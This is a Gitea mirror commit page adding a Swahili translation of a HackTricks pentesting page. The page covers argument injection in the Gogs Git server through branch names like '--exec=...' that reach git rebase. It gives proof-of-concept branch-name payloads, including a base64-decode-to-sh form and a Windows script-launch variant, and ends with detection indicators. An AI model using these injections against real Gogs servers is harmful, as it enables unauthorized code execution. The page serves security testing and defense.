gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-06-12 19:11:44 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-ci-cd/gogs-security/README.md'] to sw

Browse Source
This commit is contained in:
Translator
2026-06-05 13:57:22 +00:00
parent 86c040ecbe
commit b0f4115e6a
1 changed files with 103 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
src/pentesting-ci-cd/gogs-security/README.md
+103
View File
@@ -0,0 +1,103 @@
# Gogs Security
{{#include ../../banners/hacktricks-training.md}}
## Gogs ni nini
**Gogs** ni **huduma ya Git nyepesi inayojihost** iliyoandikwa kwa Go. Kutoka kwa mtazamo wa mshambuliaji, ichukulie kama **jukwaa la host ya Git la watumiaji wengi** ambapo mtumiaji mwenye ruhusa ya chini bado anaweza kudhibiti majina ya branch, pull requests, webhooks, tokens, na mipangilio ya repository.
## Git option injection kupitia refs / majina ya branch
Kama application inapita **ref name** inayodhibitiwa na mshambuliaji moja kwa moja kwa Git command **bila `--` au `--end-of-options`**, branch inayoanza na `--` inaweza kuchambuliwa kama **Git option** badala ya data.
Muundo wa kawaida wa hatari:
```bash
git <subcommand> <user-controlled-ref>
```
Muundo salama zaidi unaotarajiwa katika code ya kujihami:
```bash
git <subcommand> -- <user-controlled-ref>
# or
git <subcommand> --end-of-options <user-controlled-ref>
```
Dhana potofu la kawaida ni kwamba kuthibitisha ref kwa `git rev-parse --verify <ref>` kunatosha. **Sio**:
- mshambuliaji anaweza kwanza **kuunda branch halisi** whose name starts with `--`
- `rev-parse --verify` only checks that the ref resolves to an object
- a later unsafe Git invocation may still parse the same value as an **option**
Hii hugeuza feature yoyote ya Git-hosting inayotumia tena majina ya branch yaliyohifadhiwa kuwa primitive inayowezekana ya RCE.
## Kutumia vibaya `git rebase --exec` kwa RCE
`git rebase` supports `--exec=<cmd>`, which runs the command through `sh -c` after replaying commits. Therefore, if the base branch of a pull request reaches a call similar to:
```bash
git rebase --quiet <baseBranch> <headBranch>
```
na `<baseBranch>` inadhibitiwa na mshambuliaji, tawi kama:
```bash
--exec=touch${IFS}/tmp/rce_proof
```
inaweza kutafsiriwa kama **Git flag** badala ya jina la branch.
### Kwa nini `${IFS}` ni muhimu
Git refs haziwezi kuwa na spaces halisi, lakini shell expansion bado hutokea wakati Git inatekeleza `--exec` kupitia `sh -c`. `${IFS}` hupanuliwa kuwa whitespace wakati wa runtime, ikiruhusu payloads kama:
```bash
--exec=touch${IFS}/tmp/rce_proof
--exec=id${IFS}>/tmp/out
```
Kwa payloads zinazohitaji herufi zilizokatazwa na Git (`:`, `~`, `^`, `?`, `*`, `[`, `\\`, `//`), encode amri halisi na decode wakati wa execution:
```bash
--exec=echo${IFS}<base64_payload>|base64${IFS}-d|sh
```
## Windows-specific payload delivery
Kwenye Windows, inline payloads ziko na vizuizi zaidi kwa sababu Git huhifadhi branch refs kama files na NTFS hukataza characters kama `|` ndani ya filenames. Njia mbadala ya vitendo ni:
1. Commit payload script ndani ya repository (kwa mfano `.abcdef`)
2. Create a branch kama:
```bash
--exec=sh${IFS}.abcdef
```
Ikiwa Git for Windows inazindua payload kupitia **MSYS2 `sh`**, herufi za meta za PowerShell zinaweza kuharibika. Suluhisho la vitendo ni kuacha script iliyocommit iite:
```bash
cmd.exe //c .abcdef.bat
```
where `//c` ni umbo salama kwa MSYS2 la Windows `/c`.
## Matumizi mabaya ya state-machine ya Merge / PR
Unapojaribu majukwaa ya Git-hosting, usiangalie tu command ya mwisho yenye hatari. Pia kagua **njia za awali za uthibitishaji** na **ukaguzi wa nyuma unaorudiwa**.
Muundo mmoja muhimu wa exploitation ni:
1. Njia ya awali ya uthibitishaji hutumia flow ya clone/fetch **salama** yenye `--end-of-options`, hivyo branch hasidi hukubaliwa kama data
2. Pull request inakuwa **mergeable**
3. Njia ya baadaye ya merge au checkout hutumia tena jina la branch lililohifadhiwa ndani ya Git call **isiyo salama**
4. Code execution hutokea hata kama hatua ya baadaye inashindwa na UI kurudisha **HTTP 500**
Hii ina maana feature inaweza kuwa exploitable hata wakati merge ya mwisho inaishia kwenye error, na repository lengwa inaweza kuachwa katika hali ya **corrupted partial rebase state** baada ya payload tayari ku-run.
## Mawazo ya vitendo ya kuwinda
Unapochunguza Gogs instance au huduma nyingine ya Git kama hiyo, kagua:
- Majina ya branch yanayoanza na `--`
- Kushindwa kwa merge kunakohusisha `git checkout '--exec=...'`
- Pull requests zilizokwama kuwa mergeable hata ingawa uthibitishaji wa baadaye wa branch unashindwa
- Repositories zilizoachwa katika partial rebase / broken Git state baada ya merges kushindwa
- Helper files zisizotarajiwa zilizocommitted kwenye Windows payload paths (kwa mfano dotfiles pamoja na `.bat` launchers)
- Suspicious API tokens zilizoundwa muda mfupi kabla ya failed PR merges
Mfano wa log artifact:
```text
merge: git checkout '--exec=<...>': exit status 128 - error: unknown option `exec=<...>'
```
## Marejeo
- [Rapid7 - Authenticated RCE via Argument Injection in Gogs (NOT FIXED)](https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed)
- [Metasploit module PR for Gogs rebase argument injection](https://github.com/rapid7/metasploit-framework/pull/21515)
- [Git rebase documentation (`--exec`)](https://git-scm.com/docs/git-rebase)
{{#include ../../banners/hacktricks-training.md}}